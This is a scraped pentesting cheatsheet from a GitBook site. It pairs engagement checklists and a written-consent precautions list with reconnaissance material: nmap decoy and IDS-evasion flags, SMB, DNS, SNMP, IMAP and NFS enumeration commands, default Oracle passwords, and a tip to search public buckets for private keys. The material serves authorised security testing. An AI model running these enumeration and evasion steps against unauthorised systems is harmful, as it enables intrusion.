that they agree and are aware that certain parts of their service will be subject to a simulated hacking attack. It is also highly advisable to require the contractor to forward the third-party permission sent to us so that we have actual confirmation that this permission has indeed been obtained. `☐ Evasive Testing` Evasive testing is the test of evading and passing security traffic and security systems in the customer's infrastructure. We look for techniques that allow us to find out information about the internal components and attack them. It depends on whether our contractor wants us to use such techniques or not. `☐ Risks` We must also inform our client about the risks involved in the tests and the possible consequences. Based on the risks and their potential severity, we can then set the limitations together and take certain precautions. `☐ Scope Limitations & Restrictions` It is also essential to determine which servers, workstations, or other network components are essential for the client's proper functioning and its customers. We will have to avoid these and must not influence them any further, as this could lead to critical technical errors that could also affect our client's customers in production. `☐ Information Handling` HIPAA, PCI, HITRUST, FISMA/NIST, etc. `☐ Contact Information` For the contact information, we need to create a list of each person's name, title, job title, e-mail address, phone number, office phone number, and an escalation priority order. `☐ Lines of Communication` It should also be documented which communication channels are used to exchange information between the customer and us. This may involve e-mail correspondence, telephone calls, or personal meetings. `☐ Reporting` Apart from the report's structure, any customer-specific requirements the report should contain are also discussed. In addition, we clarify how the reporting is to take place and whether a presentation of the results is desired. `☐ Payment Terms` Finally, prices and the terms of payment are explained. [PreviousDocuments](https://docs.rtlcopymemory.com/preparation/documents) [NextRules of Engagement - Checklist](https://docs.rtlcopymemory.com/preparation/rules-of-engagement-checklist) Last updated 1 year ago --- # Rules of Engagement - Checklist | My Pentesting Cheatsheet **Checkpoint** **Contents** `☐ Introduction` Description of this document. `☐ Contractor` Company name, contractor full name, job title. `☐ Penetration Testers` Company name, pentesters full name. `☐ Contact Information` Mailing addresses, e-mail addresses, and phone numbers of all client parties and penetration testers. `☐ Purpose` Description of the purpose for the conducted penetration test. `☐ Goals` Description of the goals that should be achieved with the penetration test. `☐ Scope` All IPs, domain names, URLs, or CIDR ranges. `☐ Lines of Communication` Online conferences or phone calls or face-to-face meetings, or via e-mail. `☐ Time Estimation` Start and end dates. `☐ Time of the Day to Test` Times of the day to test. `☐ Penetration Testing Type` External/Internal Penetration Test/Vulnerability Assessments/Social Engineering. `☐ Penetration Testing Locations` Description of how the connection to the client network is established. `☐ Methodologies` OSSTMM, PTES, OWASP, and others. `☐ Objectives / Flags` Users, specific files, specific information, and others. `☐ Evidence Handling` Encryption, secure protocols `☐ System Backups` Configuration files, databases, and others. `☐ Information Handling` Strong data encryption `☐ Incident Handling and Reporting` Cases for contact, pentest interruptions, type of reports `☐ Status Meetings` Frequency of meetings, dates, times, included parties `☐ Reporting` Type, target readers, focus `☐ Retesting` Start and end dates `☐ Disclaimers and Limitation of Liability` System damage, data loss `☐ Permission to Test` Signed contract, contractors agreement [PreviousContract - Checklist](https://docs.rtlcopymemory.com/preparation/contract-checklist) [NextContractors Agreement - Checklist for Physical Assessments](https://docs.rtlcopymemory.com/preparation/contractors-agreement-checklist-for-physical-assessments) Last updated 1 year ago --- # Vulnerability Assessment | My Pentesting Cheatsheet Disclosed Vulnerabilities descriptions * [CVEdetails](https://www.cvedetails.com/) * [Exploit DB](https://www.exploit-db.com/) * [Vulners](https://vulners.com/) * [Packet Storm Security](https://packetstormsecurity.com/) * [NIST](https://nvd.nist.gov/vuln/search?execution=e2s1) [PreviousInformation Gathering](https://docs.rtlcopymemory.com/information-gathering) [NextPentesting Machine](https://docs.rtlcopymemory.com/pentesting-machine) Last updated 1 year ago --- # Preparation | My Pentesting Cheatsheet [](https://docs.rtlcopymemory.com/preparation#precautionary-measures-during-penetration-tests) Precautionary Measures during Penetration Tests --------------------------------------------------------------------------------------------------------------------------------------------------- * Obtain written consent from the owner or authorized representative of the computer or network being tested * Conduct the testing within the scope of the consent obtained only and respect any limitations specified * Take measures to prevent causing damage to the systems or networks being tested * Do not access, use or disclose personal data or any other information obtained during the testing without permission * Do not intercept electronic communications without the consent of one of the parties to the communication * Do not conduct testing on systems or networks that are covered by the Health Insurance Portability and Accountability Act (HIPAA) without proper authorization [](https://docs.rtlcopymemory.com/preparation#pentesting-stages) Pentesting Stages --------------------------------------------------------------------------------------- ![](https://docs.rtlcopymemory.com/~gitbook/image?url=https%3A%2F%2F251353229-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIo1z7P4Rl2BT9EibHkhc%252Fuploads%252FJij5VBrLRwvebmzMM4lj%252F0-PT-Process.webp%3Falt%3Dmedia%26token%3D9e2958f2-6c3e-4d14-a87a-dc78e15d7a5c&width=768&dpr=4&quality=100&sign=a40cc505&sv=2) ### [](https://docs.rtlcopymemory.com/preparation#pre-engagement) **Pre-Engagement** `Pre-engagement` is educating the client and adjusting the contract. All necessary tests and their components are strictly defined and contractually recorded. In a face-to-face meeting or conference call, many arrangements are made, such as: * `Non-Disclosure Agreement` * `Goals` * `Scope` * `Time Estimation` * `Rules of Engagement` ### [](https://docs.rtlcopymemory.com/preparation#information-gathering) **Information Gathering** `Information gathering` describes how we obtain information about the necessary components in various ways. We search for information about the target company and the software and hardware in use to find potential security gaps that we may be able to leverage for a foothold. ### [](https://docs.rtlcopymemory.com/preparation#vulnerability-assessment) **Vulnerability Assessment** Once we get to the `Vulnerability Assessment` stage, we analyze the results from our `Information Gathering` stage, looking for known vulnerabilities in the systems, applications, and various versions of each to discover possible attack vectors. Vulnerability assessment is the evaluation of potential vulnerabilities, both manually and through automated means. This is used to determine the threat level and the susceptibility of a company's network infrastructure to cyber-attacks. ### [](https://docs.rtlcopymemory.com/preparation#exploitation) **Exploitation** In the `Exploitation` stage, we use the results to test our attacks against the potential vectors and execute them against the target systems to gain initial access to those systems. ### [](https://docs.rtlcopymemory.com/preparation#post-exploitation) **Post-Exploitation** At this stage of the penetration test, we already have access to the exploited machine and ensure that we still have access to it even if modifications and changes are made. During this phase, we may try to escalate our privileges to obtain the highest possible rights and hunt for sensitive data such as credentials or other data that the client is concerned with protecting (pillaging). Sometimes we perform post-exploitation to demonstrate to a client the impact of our access. Other times we perform post-exploitation as an input to the lateral movement process described next. ### [](https://docs.rtlcopymemory.com/preparation#lateral-movement) **Lateral Movement** Lateral movement describes movement within the internal network of our target company to access additional hosts at the same or a higher privilege level. It is often an iterative process combined with post-exploitation activities until we reach our goal. For example, we gain a foothold on a web server, escalate privileges and find a password in the registry. We perform further enumeration and see that this password works to access a database server as a local admin user. From here, we can pillage sensitive data from the database and find other credentials to further our access deeper into the network. In this stage, we will typically use many techniques based on the information found on the exploited host or server. ### [](https://docs.rtlcopymemory.com/preparation#proof-of-concept) **Proof-of-Concept** In this stage, we document, step-by-step, the steps we took to achieve network compromise or some level of access. Our goal is to paint a picture of how we were able to chain together multiple weaknesses to reach our goal so they can see a clear picture of how each vulnerability fits in and help prioritize their remediation efforts. If we don't document our steps well, it's hard for the client to understand what we were able to do and, thus, makes their remediation efforts more difficult. If feasible, we could create one or more scripts to automate the steps we took to assist our client in reproducing our findings. We cover this in-depth in the `Documentation & Reporting` module. ### [](https://docs.rtlcopymemory.com/preparation#post-engagement) **Post-Engagement** During post-engagement, detailed documentation is prepared for both administrators and client company management to understand the severity of the vulnerabilities found. At this stage, we also clean up all traces of our actions on all hosts and servers. During this stage, we create the deliverables for our client, hold a report walkthrough meeting, and sometimes deliver an executive presentation to target company executives or their board of directors. Lastly, we will archive our testing data per our contractual obligations and company policy. We will typically retain this data for a set period or until we perform a post-remediation assessment (retest) to test the client's fixes. * * * [](https://docs.rtlcopymemory.com/preparation#pre-engagement-1) Pre-engagement ----------------------------------------------------------------------------------- The entire pre-engagement process consists of three essential components: 1. Scoping questionnaire 2. Pre-engagement meeting 3. Kick-off meeting Document Timing for Creation `1. Non-Disclosure Agreement` (`NDA`) `After` Initial Contact `2. Scoping Questionnaire` `Before` the Pre-Engagement Meeting `3. Scoping Document` `During` the Pre-Engagement Meeting `4. Penetration Testing Proposal` (`Contract/Scope of Work` (`SoW`)) `During` the Pre-engagement Meeting `5. Rules of Engagement` (`RoE`) `Before` the Kick-Off Meeting `6. Contractors Agreement` (Physical Assessments) `Before` the Kick-Off Meeting `7. Reports` `During` and `after` the conducted Penetration Test ### [](https://docs.rtlcopymemory.com/preparation#scoping-questionnaire) Scoping Questionnaire ☐ Internal Vulnerability Assessment ☐ External Vulnerability Assessment ☐ Internal Penetration Test ☐ External Penetration Test ☐ Wireless Security Assessment ☐ Application Security Assessment ☐ Physical Security Assessment ☐ Social Engineering Assessment ☐ Red Team Assessment ☐ Web Application Security Assessment Under each of these, the questionnaire should allow the client to be more specific about the required assessment. Do they need a web application or mobile application assessment? Secure code review? Should the Internal Penetration Test be black box and semi-evasive? Do they want just a phishing assessment as part of the Social Engineering Assessment or also vishing calls? Aside from the assessment type, client name, address, and key personnel contact information, some other critical pieces of information include: How many expected live hosts? How many IPs/CIDR ranges in scope? How many Domains/Subdomains are in scope? How many wireless SSIDs in scope? How many web/mobile applications? If testing is authenticated, how many roles (standard user, admin, etc.)? For a phishing assessment, how many users will be targeted? Will the client provide a list, or we will be required to gather this list via OSINT? If the client is requesting a Physical Assessment, how many locations? If multiple sites are in-scope, are they geographically dispersed? What is the objective of the Red Team Assessment? Are any activities (such as phishing or physical security attacks) out of scope? Is a separate Active Directory Security Assessment desired? Will network testing be conducted from an anonymous user on the network or a standard domain user? Do we need to bypass Network Access Control (NAC)? Finally, we will want to ask about information disclosure and evasiveness (if applicable to the assessment type): * Is the Penetration Test black box (no information provided), grey box (only IP address/CIDR ranges/URLs provided), white box (detailed information provided) * Would they like us to test from a non-evasive, hybrid-evasive (start quiet and gradually become "louder" to assess at what level the client's security personnel detect our activities), or fully evasive. [PreviousSome other cool websites](https://docs.rtlcopymemory.com/commands-only-summary/some-other-cool-websites) [NextDocuments](https://docs.rtlcopymemory.com/preparation/documents) Last updated 1 year ago * [Precautionary Measures during Penetration Tests](https://docs.rtlcopymemory.com/preparation#precautionary-measures-during-penetration-tests) * [Pentesting Stages](https://docs.rtlcopymemory.com/preparation#pentesting-stages) * [Pre-Engagement](https://docs.rtlcopymemory.com/preparation#pre-engagement) * [Information Gathering](https://docs.rtlcopymemory.com/preparation#information-gathering) * [Vulnerability Assessment](https://docs.rtlcopymemory.com/preparation#vulnerability-assessment) * [Exploitation](https://docs.rtlcopymemory.com/preparation#exploitation) * [Post-Exploitation](https://docs.rtlcopymemory.com/preparation#post-exploitation) * [Lateral Movement](https://docs.rtlcopymemory.com/preparation#lateral-movement) * [Proof-of-Concept](https://docs.rtlcopymemory.com/preparation#proof-of-concept) * [Post-Engagement](https://docs.rtlcopymemory.com/preparation#post-engagement) * [Pre-engagement](https://docs.rtlcopymemory.com/preparation#pre-engagement-1) * [Scoping Questionnaire](https://docs.rtlcopymemory.com/preparation#scoping-questionnaire) --- # Contractors Agreement - Checklist for Physical Assessments | My Pentesting Cheatsheet **Checkpoint** `☐ Introduction` `☐ Contractor` `☐ Purpose` `☐ Goal` `☐ Penetration Testers` `☐ Contact Information` `☐ Physical Addresses` `☐ Building Name` `☐ Floors` `☐ Physical Room Identifications` `☐ Physical Components` `☐ Timeline` `☐ Notarization` `☐ Permission to Test` [PreviousRules of Engagement - Checklist](https://docs.rtlcopymemory.com/preparation/rules-of-engagement-checklist) [NextInformation Gathering](https://docs.rtlcopymemory.com/information-gathering) Last updated 1 year ago --- # Information Gathering | My Pentesting Cheatsheet [](https://docs.rtlcopymemory.com/information-gathering#osint) OSINT ------------------------------------------------------------------------- * [GitHub forks aren't "private"](https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github) [PreviousContractors Agreement - Checklist for Physical Assessments](https://docs.rtlcopymemory.com/preparation/contractors-agreement-checklist-for-physical-assessments) [NextVulnerability Assessment](https://docs.rtlcopymemory.com/vulnerability-assessment) Last updated 1 year ago --- # Pentesting Machine | My Pentesting Cheatsheet ### [](https://docs.rtlcopymemory.com/pentesting-machine#operating-system) Operating System I either use Kali Linux or ParrotOS. Usually cloning the seclists in the home directory and installing any tool I feel needed. ### [](https://docs.rtlcopymemory.com/pentesting-machine#tools) Tools The following list is a list of must-have tools I add on top of the already available ones in the distros. This list will be expanded with time * exploitdb * **Oracle-Tools-setup.sh** * [Impacket MSSQL client and tools](https://github.com/fortra/impacket/tree/master?tab=readme-ov-file#setup) * [Nuclei](https://github.com/projectdiscovery/nuclei) * crowbar * sqsh ### [](https://docs.rtlcopymemory.com/pentesting-machine#folder-structure) Folder structure Copy Projects/ └── Acme Company β”œβ”€β”€ EPT β”‚ β”œβ”€β”€ evidence β”‚ β”‚ β”œβ”€β”€ credentials β”‚ β”‚ β”œβ”€β”€ data β”‚ β”‚ └── screenshots β”‚ β”œβ”€β”€ logs β”‚ β”œβ”€β”€ scans β”‚ β”œβ”€β”€ scope β”‚ └── tools └── IPT β”œβ”€β”€ evidence β”‚ β”œβ”€β”€ credentials β”‚ β”œβ”€β”€ data β”‚ └── screenshots β”œβ”€β”€ logs β”œβ”€β”€ scans β”œβ”€β”€ scope └── tools EPT and IPT stand for External/Internal Penetration Testing ### [](https://docs.rtlcopymemory.com/pentesting-machine#note-taking-app) Note taking app There are multiple available. I will note here which one I'll stick to using after I have a definitive answer Possibilities include [Cherrytree](https://www.giuspen.com/cherrytree) [Visual Studio Code](https://code.visualstudio.com/) [Evernote](https://evernote.com/) [Notion](https://www.notion.so/) [GitBook](https://www.gitbook.com/) [Sublime Text](https://www.sublimetext.com/) [Notepad++](https://notepad-plus-plus.org/downloads) [LogSeq](https://logseq.com/) [](https://docs.rtlcopymemory.com/pentesting-machine#oracle-tools-setup.sh) Oracle-Tools-setup.sh ------------------------------------------------------------------------------------------------------ Test with `./odat.py -h` [PreviousVulnerability Assessment](https://docs.rtlcopymemory.com/vulnerability-assessment) [NextEnumeration](https://docs.rtlcopymemory.com/enumeration) Last updated 1 year ago * [Operating System](https://docs.rtlcopymemory.com/pentesting-machine#operating-system) * [Tools](https://docs.rtlcopymemory.com/pentesting-machine#tools) * [Folder structure](https://docs.rtlcopymemory.com/pentesting-machine#folder-structure) * [Note taking app](https://docs.rtlcopymemory.com/pentesting-machine#note-taking-app) * [Oracle-Tools-setup.sh](https://docs.rtlcopymemory.com/pentesting-machine#oracle-tools-setup.sh) Copy #!/bin/bash sudo apt-get install libaio1 python3-dev alien -y git clone https://github.com/quentinhardy/odat.git cd odat/ git submodule init git submodule update wget https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-basic-linux.x64-21.12.0.0.0dbru.zip unzip instantclient-basic-linux.x64-21.12.0.0.0dbru.zip wget https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip unzip instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip export LD_LIBRARY_PATH=instantclient_21_12:$LD_LIBRARY_PATH export PATH=$LD_LIBRARY_PATH:$PATH pip3 install cx_Oracle sudo apt-get install python3-scapy -y sudo pip3 install colorlog termcolor passlib python-libnmap sudo apt-get install build-essential libgmp-dev -y pip3 install pycryptodome --- # Firewall and IDS/IPS Evasion | My Pentesting Cheatsheet To determine firewall rules the `-sA` scan is very useful Detecting the presence of IDS or IPS systems may get your IP blocked. It's useful to have multiple VPS boxes with different IPs to perform the pentesting from. ### [](https://docs.rtlcopymemory.com/enumeration/firewall-and-ids-ips-evasion#decoys) Decoys Flag: `-D` Generates random IP addresses (for example 5: `-D RND:5`) and uses them as sender addresses in the TCP headers **in addition to our own** actual address. For good measure and to not get detected as a SYN Flood the IP addresses used should be alive. It's possible to manually specify the source IP address with: `-S` usually with `-e tun0` to specify the interface Decoys can be used for SYN, ACK, ICMP scans, and OS detection scans ### [](https://docs.rtlcopymemory.com/enumeration/firewall-and-ids-ips-evasion#dns-proxying) DNS Proxying DNS usually uses port `53/UDP` but some modern specifications also use `53/TCP` (Zone transfer, DNSSEC). For this, we can use port 53 as our own source port to be more highly trusted by some not perfectly setup IDS/IPS `--source-port 53` [PreviousNMAP Scan types explained](https://docs.rtlcopymemory.com/enumeration/nmap-scan-types-explained) [NextFootprinting](https://docs.rtlcopymemory.com/footprinting) Last updated 1 year ago * [Decoys](https://docs.rtlcopymemory.com/enumeration/firewall-and-ids-ips-evasion#decoys) * [DNS Proxying](https://docs.rtlcopymemory.com/enumeration/firewall-and-ids-ips-evasion#dns-proxying) --- # Samba (smb) | My Pentesting Cheatsheet ### [](https://docs.rtlcopymemory.com/footprinting/samba-smb#smbclient) smbclient Remember to escape the double `\` before the target IP/Domain. Usually looks like `\\\\10.10.10.10` The rest of the path also need escaping: `\\\\10.10.10.10\\users` Flag Description `-L` retrieve a list of available shares `-N` suppresses the password prompt (null session) `-U` Specify user (can be put after address) Order matters, for example: `-L -N` will ask for the password still while `-N -L` will work fine ### [](https://docs.rtlcopymemory.com/footprinting/samba-smb#rpcclient) rpcclient The [Remote Procedure Call](https://www.geeksforgeeks.org/remote-procedure-call-rpc-in-operating-system/) (`RPC`) is a concept and, therefore, also a central tool to realize operational and work-sharing structures in networks and client-server architectures. [man page](https://www.samba.org/samba/docs/current/man-html/rpcclient.1.html) `srvinfo` Server information. `enumdomains` Enumerate all domains that are deployed in the network. `querydominfo` Provides domain, server, and user information of deployed domains. `netshareenumall` Enumerates all available shares. `netsharegetinfo ` Provides information about a specific share. `enumdomusers` Enumerates all domain users. `queryuser ` Provides information about a specific user. Copy $ rpcclient -U "" 10.129.14.128 Enter WORKGROUP\'s password: rpcclient $> srvinfo rpcclient $> enumdomains rpcclient $> querydominfo rpcclient $> netshareenumall rpcclient $> netsharegetinfo rpcclient $> enumdomusers rpcclient $> queryuser rpcclient $> querygroup Example of Bash command to enumerate every user based on rid Other tools that automate this: [Samrdump](https://github.com/fortra/impacket/blob/master/examples/samrdump.py) , [SMBMap](https://github.com/ShawnDEvans/smbmap) or [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec) Worth mentioning but more verbose: [enum4linux-ng](https://github.com/cddmp/enum4linux-ng) [PreviousGoogle Dorks](https://docs.rtlcopymemory.com/footprinting/google-dorks) [NextNFS](https://docs.rtlcopymemory.com/footprinting/nfs) Last updated 1 year ago * [smbclient](https://docs.rtlcopymemory.com/footprinting/samba-smb#smbclient) * [rpcclient](https://docs.rtlcopymemory.com/footprinting/samba-smb#rpcclient) Copy for i in $(seq 500 1100);do rpcclient -N -U "" 10.129.14.128 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done --- # Footprinting | My Pentesting Cheatsheet [](https://docs.rtlcopymemory.com/footprinting#domain-information) Domain Information ------------------------------------------------------------------------------------------ * [crt.sh](https://crt.sh/) : Certificate checking for subdomains * Command to get unique list of domains * `curl -s https://crt.sh/?q=inlanefreight.com&output=json | jq . | grep name | cut -d":" -f2 | grep -v "CN=" | cut -d'"' -f2 | awk '{gsub(/\n/,"\n");}1;' | sort -u` * Find internet accessible hosts (and not third party ones as we may not have permissions): * `for i in $(cat subdomainlist);do host $i | grep "has address" | grep inlanefreight.com | cut -d" " -f1,4;done` * [Shodan](https://www.shodan.io/) all the IPs: * `for i in $(cat ip-addresses.txt);do shodan host $i;done` * Check SSL certs * DNS Records: * `dig any ` * Potential information about services used like gmail, mailgun, logmein, ... [](https://docs.rtlcopymemory.com/footprinting#cloud-resources) Cloud Resources ------------------------------------------------------------------------------------ Good start on S3 buckets (AWS), blobs (Azure), cloud storage (GCP), R2 Buckets (Cloudflare), ... [Domain.glass](https://domain.glass/) can give good info from the domain name like if Cloudflare is present [https://buckets.grayhatwarfare.com/](https://buckets.grayhatwarfare.com/) for buckets information. Try looking for `id_rsa` [PreviousFirewall and IDS/IPS Evasion](https://docs.rtlcopymemory.com/enumeration/firewall-and-ids-ips-evasion) [NextGoogle Dorks](https://docs.rtlcopymemory.com/footprinting/google-dorks) Last updated 1 year ago * [Domain Information](https://docs.rtlcopymemory.com/footprinting#domain-information) * [Cloud Resources](https://docs.rtlcopymemory.com/footprinting#cloud-resources) --- # NFS | My Pentesting Cheatsheet Copy sudo nmap 10.129.14.128 -p111,2049 -sV -sC More specific scripts: Copy sudo nmap --script nfs* 10.129.14.128 -sV -p111,2049 #### [](https://docs.rtlcopymemory.com/footprinting/nfs#mount-it-on-local-fs-linux) Mount it on local FS (Linux) Copy showmount -e 10.129.14.128 Copy mkdir target-NFS sudo mount -t nfs 10.129.14.128:/ ./target-NFS/ -o nolock NFS file permissions are based on UID and GID like normal Linux FS permissions. Enumerate the UID and GID using `ls -l` and those cna be replicated on local machine. (unless `root_squash` is enabled on the NFS config, then root owned files could not be editable) Also useful to tranfer files with `SUID` flags to move laterally on the host. #### [](https://docs.rtlcopymemory.com/footprinting/nfs#unmounting) Unmounting Copy sudo umount ./target-NFS [PreviousSamba (smb)](https://docs.rtlcopymemory.com/footprinting/samba-smb) [NextDNS](https://docs.rtlcopymemory.com/footprinting/dns) Last updated 1 year ago --- # Google Dorks | My Pentesting Cheatsheet `inurl:` Usually put AWS domains or similar `intext:` Used with above to filter by documents containing the company name [PreviousFootprinting](https://docs.rtlcopymemory.com/footprinting) [NextSamba (smb)](https://docs.rtlcopymemory.com/footprinting/samba-smb) Last updated 1 year ago --- # DNS | My Pentesting Cheatsheet Find other nameservers: Copy dig ns @ Sometimes it's possible to get the version: Copy dig CH TXT version.bind Show all records: Copy dig any ### [](https://docs.rtlcopymemory.com/footprinting/dns#zone-transfers-or-asynchronous-full-transfer-zone-axfr) Zone transfers or Asynchronous Full Transfer Zone (AXFR) They use `TCP` port 53 Copy dig axfr @ If the administrator used a subnet for the `allow-transfer` option for testing purposes or as a workaround solution or set it to `any`, everyone would query the entire zone file at the DNS server. In addition, other zones can be queried, which may even show internal IP addresses and hostnames. Manual bruteforcing: Copy for sub in $(cat /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-110000.txt);do dig $sub.inlanefreight.htb @10.129.14.128 | grep -v ';\|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a subdomains.txt;done [](https://docs.rtlcopymemory.com/footprinting/dns#tool) Tool ------------------------------------------------------------------ [DNSenum](https://github.com/fwaeytens/dnsenum) [PreviousNFS](https://docs.rtlcopymemory.com/footprinting/nfs) [NextSMTP](https://docs.rtlcopymemory.com/footprinting/smtp) Last updated 1 year ago * [Zone transfers or Asynchronous Full Transfer Zone (AXFR)](https://docs.rtlcopymemory.com/footprinting/dns#zone-transfers-or-asynchronous-full-transfer-zone-axfr) * [Tool](https://docs.rtlcopymemory.com/footprinting/dns#tool) --- # SMTP | My Pentesting Cheatsheet Nmap script: [smtp-open-relay](https://nmap.org/nsedoc/scripts/smtp-open-relay.html) `telnet 25` `AUTH PLAIN` AUTH is a service extension used to authenticate the client. `HELO` The client logs in with its computer name and thus starts the session. `MAIL FROM` The client names the email sender. `RCPT TO` The client names the email recipient. `DATA` The client initiates the transmission of the email. `RSET` The client aborts the initiated transmission but keeps the connection between client and server. `VRFY` The client checks if a mailbox is available for message transfer. `EXPN` The client also checks if a mailbox is available for messaging with this command. `NOOP` The client requests a response from the server to prevent disconnection due to time-out. `QUIT` The client terminates the session. [](https://docs.rtlcopymemory.com/footprinting/smtp#tools) Tools --------------------------------------------------------------------- Metasploit (msfconsole) module: `scanner/smtp/smtp_enum` [smtp-user-enum](https://www.kali.org/tools/smtp-user-enum/) [PreviousDNS](https://docs.rtlcopymemory.com/footprinting/dns) [NextIMAP/POP3](https://docs.rtlcopymemory.com/footprinting/imap-pop3) Last updated 1 year ago --- # SNMP | My Pentesting Cheatsheet [](https://docs.rtlcopymemory.com/footprinting/snmp#mib) MIB ----------------------------------------------------------------- Management Information Base. Offers a standardized tree view of all queryable SNMP objects `Abstract Syntax Notation One` (`ASN.1`) based ASCII text format The MIBs do not contain data, but they explain where to find which information and what it looks like [](https://docs.rtlcopymemory.com/footprinting/snmp#oid) OID ----------------------------------------------------------------- The OIDs consist of integers and are usually concatenated by dot notation. We can look up many MIBs for the associated OIDs in the [Object Identifier Registry](https://www.alvestrand.no/objectid/) . [](https://docs.rtlcopymemory.com/footprinting/snmp#versions) Versions --------------------------------------------------------------------------- v1 and v2 are plain text and unencrypted. v3 adds authentication and encryption (pre-shared key). [](https://docs.rtlcopymemory.com/footprinting/snmp#community-strings) **Community Strings** ------------------------------------------------------------------------------------------------- Community strings can be seen as passwords that are used to determine whether the requested information can be viewed or not. It is important to note that many organizations are still using `SNMPv2`, as the transition to `SNMPv3` can be very complex, but the services still need to remain active [](https://docs.rtlcopymemory.com/footprinting/snmp#dangerous-settings) Dangerous settings ----------------------------------------------------------------------------------------------- **Settings** **Description** `rwuser noauth` Provides access to the full OID tree without authentication. `rwcommunity ` Provides access to the full OID tree regardless of where the requests were sent from. `rwcommunity6 ` Same access as with `rwcommunity` with the difference of using IPv6. [](https://docs.rtlcopymemory.com/footprinting/snmp#tools) Tools --------------------------------------------------------------------- snmpwalk * `snmpwalk -v2c -c public ` onesixtyone * `onesixtyone -c /opt/useful/SecLists/Discovery/SNMP/snmp.txt ` braa * `braa @:.1.3.6.*` [PreviousIMAP/POP3](https://docs.rtlcopymemory.com/footprinting/imap-pop3) [NextMySQL](https://docs.rtlcopymemory.com/footprinting/mysql) Last updated 1 year ago * [MIB](https://docs.rtlcopymemory.com/footprinting/snmp#mib) * [OID](https://docs.rtlcopymemory.com/footprinting/snmp#oid) * [Versions](https://docs.rtlcopymemory.com/footprinting/snmp#versions) * [Community Strings](https://docs.rtlcopymemory.com/footprinting/snmp#community-strings) * [Dangerous settings](https://docs.rtlcopymemory.com/footprinting/snmp#dangerous-settings) * [Tools](https://docs.rtlcopymemory.com/footprinting/snmp#tools) --- # MySQL | My Pentesting Cheatsheet `sudo nmap 10.129.14.128 -sV -sC -p3306 --script mysql*` `mysql -u -p -h ` Connect to the MySQL server. There should **not** be a space between the '-p' flag, and the password. `show databases;` Show all databases. `use ;` Select one of the existing databases. `show tables;` Show all available tables in the selected database. `show columns from ;` Show all columns in the selected database. `select * from
;` Show everything in the desired table. `select * from
where = "";` Search for needed `string` in the desired table. `select version();` Version `use mysql;` `show tables;` `select host, unique_users from host_summary;` [PreviousSNMP](https://docs.rtlcopymemory.com/footprinting/snmp) [NextMSSQL](https://docs.rtlcopymemory.com/footprinting/mssql) Last updated 1 year ago --- # IMAP/POP3 | My Pentesting Cheatsheet [](https://docs.rtlcopymemory.com/footprinting/imap-pop3#imap-commands) **IMAP Commands** ---------------------------------------------------------------------------------------------- **Command** **Description** `1 LOGIN username password` User's login. `1 LIST "" *` Lists all directories. `1 CREATE "INBOX"` Creates a mailbox with a specified name. `1 DELETE "INBOX"` Deletes a mailbox. `1 RENAME "ToRead" "Important"` Renames a mailbox. `1 LSUB "" *` Returns a subset of names from the set of names that the User has declared as being `active` or `subscribed`. `1 SELECT INBOX` Selects a mailbox so that messages in the mailbox can be accessed. `1 UNSELECT INBOX` Exits the selected mailbox. `1 FETCH all` Retrieves data associated with a message in the mailbox. `1 CLOSE` Removes all messages with the `Deleted` flag set. `1 LOGOUT` Closes the connection with the IMAP server. `1 FETCH 1:* full` to get most information `1 FETCH 1:* BODY[TEXT]` to get the text in the body [](https://docs.rtlcopymemory.com/footprinting/imap-pop3#pop3-commands) **POP3 Commands** ---------------------------------------------------------------------------------------------- **Command** **Description** `USER username` Identifies the user. `PASS password` Authentication of the user using its password. `STAT` Requests the number of saved emails from the server. `LIST` Requests from the server the number and size of all emails. `RETR id` Requests the server to deliver the requested email by ID. `DELE id` Requests the server to delete the requested email by ID. `CAPA` Requests the server to display the server capabilities. `RSET` Requests the server to reset the transmitted information. `QUIT` Closes the connection with the POP3 server. [](https://docs.rtlcopymemory.com/footprinting/imap-pop3#dangerous-configuration-settings) Dangerous Configuration settings -------------------------------------------------------------------------------------------------------------------------------- **Setting** **Description** `auth_debug` Enables all authentication debug logging. `auth_debug_passwords` This setting adjusts log verbosity, the submitted passwords, and the scheme gets logged. `auth_verbose` Logs unsuccessful authentication attempts and their reasons. `auth_verbose_passwords` Passwords used for authentication are logged and can also be truncated. `auth_anonymous_username` This specifies the username to be used when logging in with the ANONYMOUS SASL mechanism. [](https://docs.rtlcopymemory.com/footprinting/imap-pop3#tools) Tools -------------------------------------------------------------------------- nmap with default scripts curl `curl -k 'imaps://' --user user:p4ssw0rd` OpenSSL for encrypted interactions: * `openssl s_client -connect 10.129.14.128:pop3s` * `openssl s_client -connect 10.129.14.128:imaps` [PreviousSMTP](https://docs.rtlcopymemory.com/footprinting/smtp) [NextSNMP](https://docs.rtlcopymemory.com/footprinting/snmp) Last updated 1 year ago * [IMAP Commands](https://docs.rtlcopymemory.com/footprinting/imap-pop3#imap-commands) * [POP3 Commands](https://docs.rtlcopymemory.com/footprinting/imap-pop3#pop3-commands) * [Dangerous Configuration settings](https://docs.rtlcopymemory.com/footprinting/imap-pop3#dangerous-configuration-settings) * [Tools](https://docs.rtlcopymemory.com/footprinting/imap-pop3#tools) --- # Oracle TNS | My Pentesting Cheatsheet The TNS listener is configured to support various network protocols, including `TCP/IP`, `UDP`, `IPX/SPX`, and `AppleTalk` The configuration files for Oracle TNS are called `tnsnames.ora` and `listener.ora` and are typically located in the `$ORACLE_HOME/network/admin` directory Oracle 9 has a default password, `CHANGE_ON_INSTALL`, whereas Oracle 10 has no default password set Oracle DBSNMP service also uses a default password, `dbsnmp` Each database or service has a unique entry in the [tnsnames.ora](https://docs.oracle.com/cd/E11882_01/network.112/e10835/tnsnames.htm#NETRF007) file In Oracle RDBMS, a System Identifier (`SID`) is a unique name that identifies a particular database instance The SIDs are an essential part of the connection process, as it identifies the specific instance of the database the client wants to connect to. There are various ways to enumerate, or better said, guess SIDs. Therefore we can use tools like `nmap`, `hydra`, `odat`, and others. [](https://docs.rtlcopymemory.com/footprinting/oracle-tns#tools) Tools --------------------------------------------------------------------------- Copy ./odat.py -h If not installed, see [Pentesting 